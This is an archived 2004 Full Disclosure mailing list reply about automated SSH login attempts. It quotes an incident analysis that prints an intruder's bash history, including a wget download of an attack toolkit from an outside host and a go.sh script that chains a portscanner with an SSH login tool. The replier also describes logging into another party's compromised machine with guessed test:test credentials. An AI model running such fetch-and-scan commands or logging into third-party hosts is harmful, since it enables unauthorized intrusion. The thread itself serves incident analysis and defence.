Full Disclosure mailing list archives
Re: Re: Automated SSH login attempts?
From: Dagur Valberg Johannsson <dagurvj () gmail com>
Date: Thu, 29 Jul 2004 22:42:50 +0200
What I find interesting is that the file vuln.txt contained a list of IP addresses that seem to have been exploited. I tryed to login to one of them with user/pass test:test dagur@rivendale ssh $ ssh 161.53.223.3 -l test Password: Linux zagreb 2.4.26-grsec #1 SMP Thu Apr 15 17:27:27 CEST 2004 i686 GNU/Linux Connection to 161.53.223.3 closed. On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <stefan.janecek () jku at> wrote:
Hmmm - I have also been getting those login attemps, but thought them to be harmless. Maybe they are not *that* harmless, though... Today I managed to get my hands on a machine that was originating such login attempts. I must admit I am far from being a linux security expert, but this is what I've found out up to now: Whoever broke into the machine did not take any attempts to cover up his tracks - this is what I found in /root/.bash_history: ------ id uname -a w id ls wgte frauder.us/linux/ssh.tgz wget frauder.us/linux/ssh.tgz tar xzvf ssh.tgz tar xvf ssh.tgz ls cd ssh ls ../go.sh 195.178 ls pico uniq.txt vi uniq.txt ls rm -rf uniq.txt ../go.sh 167.205 ls rm -rf uniq.txt vuln.txt ../go.sh 202.148.20 ../go.sh 212.92 ../go.sh 195.197 ../go.sh 147.32 ../go.sh 213.168 ../go.sh 134.176 ../go.sh 195.83 ------ um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two binaries: go.sh: ------- ../ss 22 -b $1 -i eth0 -s 6 cat bios.txt |sort | uniq > uniq.txt ../sshf ------- * 'ss' apparently is some sort of portscanner * 'sshf' connects to every IP in uniq.txt and tries to log in as user 'test' first, then as user 'guest' (according to tcpdump). This does not seem to be a stupid brute force attack, as there is only one login attempt per user. Could it be that the tool tries to exploit some vulnerability in the sshd, and just tries to look harmless by using 'test' and 'guest' as usernames? The compromised machine was running an old debian woody installation which had not been upgraded for at least one year, the sshd version string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' As already mentioned, I am far from being an expert, but if I can assist in further testing, then let me know. Please CC me, I am not subscribed to the list. cheers, Stefan _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Automated SSH login attempts?, (continued)
- Re: Automated SSH login attempts? Stefan Janecek (Jul 29)
- Re: Re: Automated SSH login attempts? Valdis . Kletnieks (Jul 29)
- Re: Re: Automated SSH login attempts? Jan Muenther (Jul 30)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Max Valdez (Jul 29)
- Re: Re: Automated SSH login attempts? dmargoli (Jul 29)
- Re: Re: Automated SSH login attempts? Ron DuFresne (Jul 29)
- Re: Re: Automated SSH login attempts? joe smith (Jul 29)
- Re: Re: Automated SSH login attempts? Valdis . Kletnieks (Jul 29)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Max Valdez (Jul 29)
- Re: Re: Automated SSH login attempts? Dagur Valberg Johannsson (Jul 29)
- Re: Re: Automated SSH login attempts? dmargoli (Jul 29)
- Re: Re: Automated SSH login attempts? Stefan Janecek (Jul 30)
- Re: Re: Automated SSH login attempts? andrewg (Jul 30)
- Re: Re: Automated SSH login attempts? nicolas vigier (Jul 30)
- Re: Re: Automated SSH login attempts? morning_wood (Jul 30)
- Re: Automated SSH login attempts? Stefan Janecek (Jul 29)
- Re: Automated SSH login attempts? Dan Margolis (Jul 30)